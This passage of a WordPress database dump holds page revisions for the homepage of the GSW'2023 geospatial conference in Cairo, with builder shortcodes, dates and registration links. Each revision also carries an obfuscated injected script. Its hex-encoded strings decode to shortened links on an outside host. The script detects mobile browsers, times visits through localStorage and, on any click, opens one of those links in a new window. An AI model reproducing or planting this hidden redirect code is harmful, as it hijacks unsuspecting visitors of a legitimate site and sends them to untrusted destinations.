os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:07:25','2022-11-09 19:07:25','',3066,'https://gsw2023.com/?p=3201',0,'revision','',0),
(3202,1,'2022-11-09 19:08:34','2022-11-09 19:08:34','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:08:34','2022-11-09 19:08:34','',3066,'https://gsw2023.com/?p=3202',0,'revision','',0),
(3203,1,'2022-11-09 19:09:39','2022-11-09 19:09:39','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px 